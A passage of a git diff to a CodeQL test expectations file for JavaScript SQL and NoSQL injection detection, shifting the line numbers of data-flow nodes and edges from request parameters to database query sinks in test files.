tst2.js:8:3:8:85 | new sql ... + "'") | | tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | | tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | | tst4.js:8:3:8:67 | db.get( ... + '"') | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected index 5ae279288cf8..e19e6731ee75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected @@ -1,38 +1,38 @@ nodes | graphql.js:8:11:8:28 | id | semmle.label | id | | graphql.js:8:16:8:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | semmle.label | `\\n ... }\\n ` | -| graphql.js:12:46:12:47 | id | semmle.label | id | -| graphql.js:26:11:26:28 | id | semmle.label | id | -| graphql.js:26:16:26:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:27:30:27:40 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:27:37:27:38 | id | semmle.label | id | -| graphql.js:30:32:30:42 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:30:39:30:40 | id | semmle.label | id | -| graphql.js:33:18:33:28 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:33:25:33:26 | id | semmle.label | id | -| graphql.js:39:11:39:28 | id | semmle.label | id | -| graphql.js:39:16:39:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:44:14:44:24 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:44:21:44:22 | id | semmle.label | id | -| graphql.js:48:44:48:54 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:48:51:48:52 | id | semmle.label | id | -| graphql.js:55:11:55:28 | id | semmle.label | id | -| graphql.js:55:16:55:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:56:39:56:49 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:56:46:56:47 | id | semmle.label | id | -| graphql.js:58:66:58:76 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:58:73:58:74 | id | semmle.label | id | -| graphql.js:74:9:74:25 | id | semmle.label | id | -| graphql.js:74:14:74:25 | req.query.id | semmle.label | req.query.id | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | -| graphql.js:75:56:75:57 | id | semmle.label | id | -| graphql.js:84:14:90:8 | `{\\n ... }` | semmle.label | `{\\n ... }` | -| graphql.js:88:13:88:14 | id | semmle.label | id | -| graphql.js:119:11:119:28 | id | semmle.label | id | -| graphql.js:119:16:119:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:120:38:120:48 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:120:45:120:46 | id | semmle.label | id | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | semmle.label | ` // $ ... }\\n ` | +| graphql.js:11:46:11:47 | id | semmle.label | id | +| graphql.js:25:11:25:28 | id | semmle.label | id | +| graphql.js:25:16:25:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:26:30:26:40 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:26:37:26:38 | id | semmle.label | id | +| graphql.js:29:32:29:42 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:29:39:29:40 | id | semmle.label | id | +| graphql.js:32:18:32:28 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:32:25:32:26 | id | semmle.label | id | +| graphql.js:38:11:38:28 | id | semmle.label | id | +| graphql.js:38:16:38:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:43:14:43:24 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:43:21:43:22 | id | semmle.label | id | +| graphql.js:47:44:47:54 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:47:51:47:52 | id | semmle.label | id | +| graphql.js:54:11:54:28 | id | semmle.label | id | +| graphql.js:54:16:54:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:55:39:55:49 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:55:46:55:47 | id | semmle.label | id | +| graphql.js:57:66:57:76 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:57:73:57:74 | id | semmle.label | id | +| graphql.js:73:9:73:25 | id | semmle.label | id | +| graphql.js:73:14:73:25 | req.query.id | semmle.label | req.query.id | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | +| graphql.js:74:56:74:57 | id | semmle.label | id | +| graphql.js:82:14:88:8 | `{ // $ ... }` | semmle.label | `{ // $ ... }` | +| graphql.js:86:13:86:14 | id | semmle.label | id | +| graphql.js:117:11:117:28 | id | semmle.label | id | +| graphql.js:117:16:117:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:118:38:118:48 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:118:45:118:46 | id | semmle.label | id | | html-sanitizer.js:13:39:13:44 | param1 | semmle.label | param1 | | html-sanitizer.js:14:5:14:24 | param1 | semmle.label | param1 | | html-sanitizer.js:14:14:14:24 | xss(param1) | semmle.label | xss(param1) | @@ -84,125 +84,125 @@ nodes | marsdb-flow-to.js:10:17:10:18 | {} | semmle.label | {} | | marsdb-flow-to.js:11:17:11:24 | req.body | semmle.label | req.body | | marsdb-flow-to.js:11:17:11:30 | req.body.title | semmle.label | req.body.title | -| marsdb-flow-to.js:14:17:14:21 | query | semmle.label | query | +| marsdb-flow-to.js:13:17:13:21 | query | semmle.label | query | | marsdb.js:12:9:12:18 | query | semmle.label | query | | marsdb.js:12:17:12:18 | {} | semmle.label | {} | | marsdb.js:13:17:13:24 | req.body | semmle.label | req.body | | marsdb.js:13:17:13:30 | req.body.title | semmle.label | req.body.title | -| marsdb.js:16:12:16:16 | query | semmle.label | query | +| marsdb.js:15:12:15:16 | query | semmle.label | query | | minimongo.js:14:9:14:18 | query | semmle.label | query | | minimongo.js:14:17:14:18 | {} | semmle.label | {} | | minimongo.js:15:17:15:24 | req.body | semmle.label | req.body | | minimongo.js:15:17:15:30 | req.body.title | semmle.label | req.body.title | -| minimongo.js:18:12:18:16 | query | semmle.label | query | +| minimongo.js:17:12:17:16 | query | semmle.label | query | | mongodb.js:12:11:12:20 | query | semmle.label | query | | mongodb.js:12:19:12:20 | {} | semmle.label | {} | | mongodb.js:13:5:13:9 | query | semmle.label | query | | mongodb.js:13:19:13:26 | req.body | semmle.label | req.body | | mongodb.js:13:19:13:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:18:16:18:20 | query | semmle.label | query | -| mongodb.js:26:11:26:32 | title | semmle.label | title | -| mongodb.js:26:19:26:26 | req.body | semmle.label | req.body | -| mongodb.js:26:19:26:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:32:18:32:45 | { title ... itle) } | semmle.label | { title ... itle) } | -| mongodb.js:32:27:32:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | -| mongodb.js:32:38:32:42 | title | semmle.label | title | -| mongodb.js:48:11:48:20 | query | semmle.label | query | -| mongodb.js:48:19:48:20 | {} | semmle.label | {} | -| mongodb.js:49:5:49:9 | query | semmle.label | query | -| mongodb.js:49:19:49:33 | req.query.title | semmle.label | req.query.title | -| mongodb.js:54:16:54:20 | query | semmle.label | query | -| mongodb.js:59:8:59:17 | query | semmle.label | query | -| mongodb.js:59:16:59:17 | {} | semmle.label | {} | -| mongodb.js:60:2:60:6 | query | semmle.label | query | -| mongodb.js:60:16:60:30 | req.query.title | semmle.label | req.query.title | -| mongodb.js:65:12:65:16 | query | semmle.label | query | -| mongodb.js:70:7:70:25 | tag | semmle.label | tag | -| mongodb.js:70:13:70:25 | req.query.tag | semmle.label | req.query.tag | -| mongodb.js:77:14:77:26 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:77:22:77:24 | tag | semmle.label | tag | -| mongodb.js:85:12:85:24 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:85:20:85:22 | tag | semmle.label | tag | -| mongodb.js:106:9:106:18 | query | semmle.label | query | -| mongodb.js:106:17:106:18 | {} | semmle.label | {} | -| mongodb.js:107:3:107:7 | query | semmle.label | query | -| mongodb.js:107:17:107:29 | queries.title | semmle.label | queries.title | -| mongodb.js:112:14:112:18 | query | semmle.label | query | +| mongodb.js:17:16:17:20 | query | semmle.label | query | +| mongodb.js:25:11:25:32 | title | semmle.label | title | +| mongodb.js:25:19:25:26 | req.body | semmle.label | req.body | +| mongodb.js:25:19:25:32 | req.body.title | semmle.label | req.body.title | +| mongodb.js:30:18:30:45 | { title ... itle) } | semmle.label | { title ... itle) } | +| mongodb.js:30:27:30:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | +| mongodb.js:30:38:30:42 | title | semmle.label | title | +| mongodb.js:46:11:46:20 | query | semmle.label | query | +| mongodb.js:46:19:46:20 | {} | semmle.label | {} | +| mongodb.js:47:5:47:9 | query | semmle.label | query | +| mongodb.js:47:19:47:33 | req.query.title | semmle.label | req.query.title | +| mongodb.js:51:16:51:20 | query | semmle.label | query | +| mongodb.js:56:8:56:17 | query | semmle.label | query | +| mongodb.js:56:16:56:17 | {} | semmle.label | {} | +| mongodb.js:57:2:57:6 | query | semmle.label | query | +| mongodb.js:57:16:57:30 | req.query.title | semmle.label | req.query.title | +| mongodb.js:61:12:61:16 | query | semmle.label | query | +| mongodb.js:66:7:66:25 | tag | semmle.label | tag | +| mongodb.js:66:13:66:25 | req.query.tag | semmle.label | req.query.tag | +| mongodb.js:72:14:72:26 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:72:22:72:24 | tag | semmle.label | tag | +| mongodb.js:79:12:79:24 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:79:20:79:22 | tag | semmle.label | tag | +| mongodb.js:100:9:100:18 | query | semmle.label | query | +| mongodb.js:100:17:100:18 | {} | semmle.label | {} | +| mongodb.js:101:3:101:7 | query | semmle.label | query | +| mongodb.js:101:17:101:29 | queries.title | semmle.label | queries.title | +| mongodb.js:105:14:105:18 | query | semmle.label | query | | mongodb_bodySafe.js:23:11:23:20 | query | semmle.label | query | | mongodb_bodySafe.js:23:19:23:20 | {} | semmle.label | {} | | mongodb_bodySafe.js:24:5:24:9 | query | semmle.label | query | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | semmle.label | req.query.title | -| mongodb_bodySafe.js:29:16:29:20 | query | semmle.label | query | +| mongodb_bodySafe.js:28:16:28:20 | query | semmle.label | query | | mongoose.js:20:8:20:17 | query | semmle.label | query | | mongoose.js:20:16:20:17 | {} | semmle.label | {} | | mongoose.js:21:2:21:6 | query | semmle.label | query | | mongoose.js:21:16:21:23 | req.body | semmle.label | req.body | | mongoose.js:21:16:21:29 | req.body.title | semmle.label | req.body.title | -| mongoose.js:24:21:24:27 | [query] | semmle.label | [query] | -| mongoose.js:24:22:24:26 | query | semmle.label | query | -| mongoose.js:27:17:27:21 | query | semmle.label | query | -| mongoose.js:30:22:30:26 | query | semmle.label | query | -| mongoose.js:33:21:33:25 | query | semmle.label | query | -| mongoose.js:36:28:36:32 | query | semmle.label | query | -| mongoose.js:39:16:39:20 | query | semmle.label | query | -| mongoose.js:42:19:42:23 | query | semmle.label | query | -| mongoose.js:45:28:45:32 | query | semmle.label | query | -| mongoose.js:48:28:48:32 | query | semmle.label | query | -| mongoose.js:51:28:51:32 | query | semmle.label | query | -| mongoose.js:54:22:54:26 | query | semmle.label | query | -| mongoose.js:57:18:57:22 | query | semmle.label | query | -| mongoose.js:60:22:60:26 | query | semmle.label | query | -| mongoose.js:63:21:63:25 | query | semmle.label | query | -| mongoose.js:65:32:65:36 | query | semmle.label | query | -| mongoose.js:67:27:67:31 | query | semmle.label | query | -| mongoose.js:68:8:68:12 | query | semmle.label | query | -| mongoose.js:71:17:71:21 | query | semmle.label | query | -| mongoose.js:72:10:72:14 | query | semmle.label | query | -| mongoose.js:73:8:73:12 | query | semmle.label | query | -| mongoose.js:74:7:74:11 | query | semmle.label | query | -| mongoose.js:75:16:75:20 | query | semmle.label | query | -| mongoose.js:76:12:76:16 | query | semmle.label | query | -| mongoose.js:77:10:77:14 | query | semmle.label | query | -| mongoose.js:81:37:81:41 | query | semmle.label | query | +| mongoose.js:23:21:23:27 | [query] | semmle.label | [query] | +| mongoose.js:23:22:23:26 | query | semmle.label | query | +| mongoose.js:25:17:25:21 | query | semmle.label | query | +| mongoose.js:27:22:27:26 | query | semmle.label | query | +| mongoose.js:29:21:29:25 | query | semmle.label | query | +| mongoose.js:31:28:31:32 | query | semmle.label | query | +| mongoose.js:33:16:33:20 | query | semmle.label | query | +| mongoose.js:35:19:35:23 | query | semmle.label | query | +| mongoose.js:37:28:37:32 | query | semmle.label | query | +| mongoose.js:39:28:39:32 | query | semmle.label | query | +| mongoose.js:41:28:41:32 | query | semmle.label | query | +| mongoose.js:43:22:43:26 | query | semmle.label | query | +| mongoose.js:45:18:45:22 | query | semmle.label | query | +| mongoose.js:47:22:47:26 | query | semmle.label | query | +| mongoose.js:49:21:49:25 | query | semmle.label | query | +| mongoose.js:51:32:51:36 | query | semmle.label | query | +| mongoose.js:53:27:53:31 | query | semmle.label | query | +| mongoose.js:54:8:54:12 | query | semmle.label | query | +| mongoose.js:57:17:57:21 | query | semmle.label | query | +| mongoose.js:58:10:58:14 | query | semmle.label | query | +| mongoose.js:59:8:59:12 | query | semmle.label | query | +| mongoose.js:60:7:60:11 | query | semmle.label | query | +| mongoose.js:61:16:61:20 | query | semmle.label | query | +| mongoose.js:62:12:62:16 | query | semmle.label | query | +| mongoose.js:63:10:63:14 | query | semmle.label | query | +| mongoose.js:67:37:67:41 | query | semmle.label | query | +| mongoose.js:68:46:68:50 | query | semmle.label | query | +| mongoose.js:69:47:69:51 | query | semmle.label | query | +| mongoose.js:71:46:71:50 | query | semmle.label | query | +| mongoose.js:73:51:73:55 | query | semmle.label | query | +| mongoose.js:75:46:75:50 | query | semmle.label | query | +| mongoose.js:78:46:78:50 | query | semmle.label | query | +| mongoose.js:80:51:80:55 | query | semmle.label | query | | mongoose.js:82:46:82:50 | query | semmle.label | query | -| mongoose.js:83:47:83:51 | query | semmle.label | query | -| mongoose.js:85:46:85:50 | query | semmle.label | query | -| mongoose.js:87:51:87:55 | query | semmle.label | query | -| mongoose.js:89:46:89:50 | query | semmle.label | query | -| mongoose.js:92:46:92:50 | query | semmle.label | query | -| mongoose.js:94:51:94:55 | query | semmle.label | query | -| mongoose.js:96:46:96:50 | query | semmle.label | query | -| mongoose.js:104:21:104:25 | query | semmle.label | query | -| mongoose.js:111:14:111:18 | query | semmle.label | query | -| mongoose.js:113:31:113:35 | query | semmle.label | query | -| mongoose.js:115:6:115:22 | id | semmle.label | id | -| mongoose.js:115:11:115:22 | req.query.id | semmle.label | req.query.id | -| mongoose.js:115:25:115:45 | cond | semmle.label | cond | -| mongoose.js:115:32:115:45 | req.query.cond | semmle.label | req.query.cond | -| mongoose.js:116:22:116:25 | cond | semmle.label | cond | -| mongoose.js:117:21:117:24 | cond | semmle.label | cond | -| mongoose.js:118:21:118:24 | cond | semmle.label | cond | -| mongoose.js:119:18:119:21 | cond | semmle.label | cond | -| mongoose.js:120:22:120:25 | cond | semmle.label | cond | -| mongoose.js:121:16:121:19 | cond | semmle.label | cond | -| mongoose.js:122:19:122:22 | cond | semmle.label | cond | -| mongoose.js:123:20:123:21 | id | semmle.label | id | -| mongoose.js:124:28:124:31 | cond | semmle.label | cond | -| mongoose.js:125:28:125:31 | cond | semmle.label | cond | -| mongoose.js:126:28:126:31 | cond | semmle.label | cond | -| mongoose.js:127:18:127:21 | cond | semmle.label | cond | -| mongoose.js:128:22:128:25 | cond | semmle.label | cond | -| mongoose.js:129:21:129:24 | cond | semmle.label | cond | -| mongoose.js:130:16:130:26 | { _id: id } | semmle.label | { _id: id } | -| mongoose.js:130:23:130:24 | id | semmle.label | id | -| mongoose.js:133:38:133:42 | query | semmle.label | query | -| mongoose.js:136:30:136:34 | query | semmle.label | query | +| mongoose.js:90:21:90:25 | query | semmle.label | query | +| mongoose.js:97:14:97:18 | query | semmle.label | query | +| mongoose.js:99:31:99:35 | query | semmle.label | query | +| mongoose.js:101:6:101:22 | id | semmle.label | id | +| mongoose.js:101:11:101:22 | req.query.id | semmle.label | req.query.id | +| mongoose.js:101:25:101:45 | cond | semmle.label | cond | +| mongoose.js:101:32:101:45 | req.query.cond | semmle.label | req.query.cond | +| mongoose.js:102:22:102:25 | cond | semmle.label | cond | +| mongoose.js:103:21:103:24 | cond | semmle.label | cond | +| mongoose.js:104:21:104:24 | cond | semmle.label | cond | +| mongoose.js:105:18:105:21 | cond | semmle.label | cond | +| mongoose.js:106:22:106:25 | cond | semmle.label | cond | +| mongoose.js:107:16:107:19 | cond | semmle.label | cond | +| mongoose.js:108:19:108:22 | cond | semmle.label | cond | +| mongoose.js:109:20:109:21 | id | semmle.label | id | +| mongoose.js:110:28:110:31 | cond | semmle.label | cond | +| mongoose.js:111:28:111:31 | cond | semmle.label | cond | +| mongoose.js:112:28:112:31 | cond | semmle.label | cond | +| mongoose.js:113:18:113:21 | cond | semmle.label | cond | +| mongoose.js:114:22:114:25 | cond | semmle.label | cond | +| mongoose.js:115:21:115:24 | cond | semmle.label | cond | +| mongoose.js:116:16:116:26 | { _id: id } | semmle.label | { _id: id } | +| mongoose.js:116:23:116:24 | id | semmle.label | id | +| mongoose.js:119:38:119:42 | query | semmle.label | query | +| mongoose.js:122:30:122:34 | query | semmle.label | query | | mongooseJsonParse.js:19:11:19:20 | query | semmle.label | query | | mongooseJsonParse.js:19:19:19:20 | {} | semmle.label | {} | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | semmle.label | JSON.pa ... y.data) | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | semmle.label | JSON.pa ... ).title | | mongooseJsonParse.js:20:30:20:43 | req.query.data | semmle.label | req.query.data | -| mongooseJsonParse.js:23:19:23:23 | query | semmle.label | query | +| mongooseJsonParse.js:22:19:22:23 | query | semmle.label | query | | mongooseModelClient.js:10:7:10:32 | v | semmle.label | v | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | semmle.label | JSON.pa ... body.x) | | mongooseModelClient.js:10:22:10:29 | req.body | semmle.label | req.body | @@ -268,8 +268,8 @@ nodes | socketio.js:10:25:10:30 | handle | semmle.label | handle | | socketio.js:11:12:11:53 | `INSERT ... andle}` | semmle.label | `INSERT ... andle}` | | socketio.js:11:46:11:51 | handle | semmle.label | handle | -| tst2.js:9:27:9:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | -| tst2.js:9:66:9:78 | req.params.id | semmle.label | req.params.id | +| tst2.js:8:27:8:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | +| tst2.js:8:66:8:78 | req.params.id | semmle.label | req.params.id | | tst3.js:7:7:8:55 | query1 | semmle.label | query1 | | tst3.js:8:16:8:34 | req.params.category | semmle.label | req.params.category | | tst3.js:9:14:9:19 | query1 | semmle.label | query1 | @@ -278,34 +278,34 @@ nodes | tst.js:10:10:10:64 | 'SELECT ... d + '"' | semmle.label | 'SELECT ... d + '"' | | tst.js:10:46:10:58 | req.params.id | semmle.label | req.params.id | edges -| graphql.js:8:11:8:28 | id | graphql.js:12:46:12:47 | id | provenance | | +| graphql.js:8:11:8:28 | id | graphql.js:11:46:11:47 | id | provenance | | | graphql.js:8:16:8:28 | req.params.id | graphql.js:8:11:8:28 | id | provenance | | -| graphql.js:12:46:12:47 | id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:27:37:27:38 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:30:39:30:40 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:33:25:33:26 | id | provenance | | -| graphql.js:26:16:26:28 | req.params.id | graphql.js:26:11:26:28 | id | provenance | | -| graphql.js:27:37:27:38 | id | graphql.js:27:30:27:40 | `foo ${id}` | provenance | | -| graphql.js:30:39:30:40 | id | graphql.js:30:32:30:42 | `foo ${id}` | provenance | | -| graphql.js:33:25:33:26 | id | graphql.js:33:18:33:28 | `foo ${id}` | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:44:21:44:22 | id | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:48:51:48:52 | id | provenance | | -| graphql.js:39:16:39:28 | req.params.id | graphql.js:39:11:39:28 | id | provenance | | -| graphql.js:44:21:44:22 | id | graphql.js:44:14:44:24 | `foo ${id}` | provenance | | -| graphql.js:48:51:48:52 | id | graphql.js:48:44:48:54 | `foo ${id}` | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:56:46:56:47 | id | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:58:73:58:74 | id | provenance | | -| graphql.js:55:16:55:28 | req.params.id | graphql.js:55:11:55:28 | id | provenance | | -| graphql.js:56:46:56:47 | id | graphql.js:56:39:56:49 | `foo ${id}` | provenance | | -| graphql.js:58:73:58:74 | id | graphql.js:58:66:58:76 | `foo ${id}` | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:75:56:75:57 | id | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:88:13:88:14 | id | provenance | | -| graphql.js:74:14:74:25 | req.query.id | graphql.js:74:9:74:25 | id | provenance | | -| graphql.js:75:56:75:57 | id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | provenance | | -| graphql.js:88:13:88:14 | id | graphql.js:84:14:90:8 | `{\\n ... }` | provenance | | -| graphql.js:119:11:119:28 | id | graphql.js:120:45:120:46 | id | provenance | | -| graphql.js:119:16:119:28 | req.params.id | graphql.js:119:11:119:28 | id | provenance | | -| graphql.js:120:45:120:46 | id | graphql.js:120:38:120:48 | `foo ${id}` | provenance | | +| graphql.js:11:46:11:47 | id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:26:37:26:38 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:29:39:29:40 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:32:25:32:26 | id | provenance | | +| graphql.js:25:16:25:28 | req.params.id | graphql.js:25:11:25:28 | id | provenance | | +| graphql.js:26:37:26:38 | id | graphql.js:26:30:26:40 | `foo ${id}` | provenance | | +| graphql.js:29:39:29:40 | id | graphql.js:29:32:29:42 | `foo ${id}` | provenance | | +| graphql.js:32:25:32:26 | id | graphql.js:32:18:32:28 | `foo ${id}` | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:43:21:43:22 | id | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:47:51:47:52 | id | provenance | | +| graphql.js:38:16:38:28 | req.params.id | graphql.js:38:11:38:28 | id | provenance | | +| graphql.js:43:21:43:22 | id | graphql.js:43:14:43:24 | `foo ${id}` | provenance | | +| graphql.js:47:51:47:52 | id | graphql.js:47:44:47:54 | `foo ${id}` | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:55:46:55:47 | id | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:57:73:57:74 | id | provenance | | +| graphql.js:54:16:54:28 | req.params.id | graphql.js:54:11:54:28 | id | provenance | | +| graphql.js:55:46:55:47 | id | graphql.js:55:39:55:49 | `foo ${id}` | provenance | | +| graphql.js:57:73:57:74 | id | graphql.js:57:66:57:76 | `foo ${id}` | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:74:56:74:57 | id | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:86:13:86:14 | id | provenance | | +| graphql.js:73:14:73:25 | req.query.id | graphql.js:73:9:73:25 | id | provenance | | +| graphql.js:74:56:74:57 | id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | provenance | | +| graphql.js:86:13:86:14 | id | graphql.js:82:14:88:8 | `{ // $ ... }` | provenance | | +| graphql.js:117:11:117:28 | id | graphql.js:118:45:118:46 | id | provenance | | +| graphql.js:117:16:117:28 | req.params.id | graphql.js:117:11:117:28 | id | provenance | | +| graphql.js:118:45:118:46 | id | graphql.js:118:38:118:48 | `foo ${id}` | provenance | | | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:14:18:14:23 | param1 | provenance | | | html-sanitizer.js:14:5:14:24 | param1 | html-sanitizer.js:16:54:16:59 | param1 | provenance | | | html-sanitizer.js:14:14:14:24 | xss(param1) | html-sanitizer.js:14:5:14:24 | param1 | provenance | | @@ -351,209 +351,209 @@ edges | ldap.js:64:38:64:45 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | | ldap.js:66:40:66:51 | parsedFilter | ldap.js:66:30:66:53 | { filte ... ilter } | provenance | Config | | ldap.js:68:33:68:40 | username | ldap.js:68:27:68:42 | `cn=${username}` | provenance | | -| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:14:17:14:21 | query | provenance | | +| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:13:17:13:21 | query | provenance | | | marsdb-flow-to.js:10:17:10:18 | {} | marsdb-flow-to.js:10:9:10:18 | query | provenance | | | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:11:17:11:30 | req.body.title | provenance | Config | | marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:9:10:18 | query | provenance | Config | | marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:17:10:18 | {} | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:14:17:14:21 | query | provenance | Config | -| marsdb.js:12:9:12:18 | query | marsdb.js:16:12:16:16 | query | provenance | | +| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:13:17:13:21 | query | provenance | Config | +| marsdb.js:12:9:12:18 | query | marsdb.js:15:12:15:16 | query | provenance | | | marsdb.js:12:17:12:18 | {} | marsdb.js:12:9:12:18 | query | provenance | | | marsdb.js:13:17:13:24 | req.body | marsdb.js:13:17:13:30 | req.body.title | provenance | Config | | marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:9:12:18 | query | provenance | Config | | marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:17:12:18 | {} | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:16:12:16:16 | query | provenance | Config | -| minimongo.js:14:9:14:18 | query | minimongo.js:18:12:18:16 | query | provenance | | +| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:15:12:15:16 | query | provenance | Config | +| minimongo.js:14:9:14:18 | query | minimongo.js:17:12:17:16 | query | provenance | | | minimongo.js:14:17:14:18 | {} | minimongo.js:14:9:14:18 | query | provenance | | | minimongo.js:15:17:15:24 | req.body | minimongo.js:15:17:15:30 | req.body.title | provenance | Config | | minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:9:14:18 | query | provenance | Config | | minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:17:14:18 | {} | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:18:12:18:16 | query | provenance | Config | +| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:17:12:17:16 | query | provenance | Config | | mongodb.js:12:11:12:20 | query | mongodb.js:13:5:13:9 | query | provenance | | | mongodb.js:12:19:12:20 | {} | mongodb.js:12:11:12:20 | query | provenance | | -| mongodb.js:13:5:13:9 | query | mongodb.js:18:16:18:20 | query | provenance | | +| mongodb.js:13:5:13:9 | query | mongodb.js:17:16:17:20 | query | provenance | | | mongodb.js:13:19:13:26 | req.body | mongodb.js:13:19:13:32 | req.body.title | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:11:12:20 | query | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:19:12:20 | {} | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:13:5:13:9 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:18:16:18:20 | query | provenance | Config | -| mongodb.js:26:11:26:32 | title | mongodb.js:32:38:32:42 | title | provenance | | -| mongodb.js:26:19:26:26 | req.body | mongodb.js:26:19:26:32 | req.body.title | provenance | Config | -| mongodb.js:26:19:26:32 | req.body.title | mongodb.js:26:11:26:32 | title | provenance | | -| mongodb.js:32:27:32:43 | JSON.parse(title) | mongodb.js:32:18:32:45 | { title ... itle) } | provenance | Config | -| mongodb.js:32:38:32:42 | title | mongodb.js:32:27:32:43 | JSON.parse(title) | provenance | Config | -| mongodb.js:48:11:48:20 | query | mongodb.js:49:5:49:9 | query | provenance | | -| mongodb.js:48:19:48:20 | {} | mongodb.js:48:11:48:20 | query | provenance | | -| mongodb.js:49:5:49:9 | query | mongodb.js:54:16:54:20 | query | provenance | | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:11:48:20 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:19:48:20 | {} | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:49:5:49:9 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | provenance | Config | -| mongodb.js:59:8:59:17 | query | mongodb.js:60:2:60:6 | query | provenance | | -| mongodb.js:59:16:59:17 | {} | mongodb.js:59:8:59:17 | query | provenance | | -| mongodb.js:60:2:60:6 | query | mongodb.js:65:12:65:16 | query | provenance | | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:8:59:17 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:16:59:17 | {} | provenance | Config | -| 